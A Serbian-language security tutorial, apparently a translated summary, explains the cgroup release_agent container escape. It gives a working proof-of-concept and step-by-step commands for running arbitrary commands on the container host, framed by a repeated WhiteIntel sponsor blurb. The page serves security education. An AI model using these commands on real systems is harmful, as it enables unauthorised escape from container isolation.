WhiteIntel

WhiteIntel je pretraživač pokretan dark web-om koji nudi besplatne funkcionalnosti za proveru da li je kompanija ili njeni korisnici kompromitovani od strane malvera za krađu.

Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.

Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za besplatno na:

Za dalje detalje, pogledajte originalni blog post. Ovo je samo sažetak:

Originalni PoC:

d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
$1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o

Dokazni koncept (PoC) demonstrira metod za iskorišćavanje cgroups-a kreiranjem release_agent datoteke i pokretanjem njenog poziva za izvršavanje proizvoljnih komandi na hostu kontejnera. Evo detaljnog pregleda uključenih koraka:

1. Priprema Okruženja:

• Kreiran je direktorijum /tmp/cgrp koji će služiti kao tačka montiranja za cgroup.

• RDMA cgroup kontroler je montiran na ovaj direktorijum. U slučaju odsustva RDMA kontrolera, predlaže se korišćenje memory cgroup kontrolera kao alternativa.

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

2. Postavite podgrupu:

• Unutar montiranog direktorijuma podgrupa se kreira pod imenom "x".

• Obaveštenja se omogućavaju za podgrupu "x" upisivanjem broja 1 u njen fajl notify_on_release.

echo 1 > /tmp/cgrp/x/notify_on_release

3. Konfigurišite Release Agent:

• Putanja kontejnera na domaćinu se dobija iz fajla /etc/mtab.

• Zatim se konfiguriše release_agent fajl cgroup-a da izvrši skriptu nazvanu /cmd smeštenu na dobijenoj putanji domaćina.

host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

4. Kreiranje i konfigurisanje /cmd skripte:

• /cmd skripta se kreira unutar kontejnera i konfiguriše se da izvrši ps aux, preusmeravajući izlaz u datoteku nazvanu /output u kontejneru. Specifikovan je pun put do /output na domaćinu.

echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd

5. Pokrenite napad:

• Proces je pokrenut unutar "x" pod-cgroup-a i odmah je završen.

• Ovo pokreće release_agent (skriptu /cmd), koja izvršava ps aux na hostu i zapisuje izlaz u /output unutar kontejnera.

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

WhiteIntel

WhiteIntel je pretraživač pokrenut na dark webu koji nudi besplatne funkcionalnosti za proveru da li je kompanija ili njeni korisnici ugroženi od malvera koji krade informacije.

Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji krade informacije.

Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za besplatno na: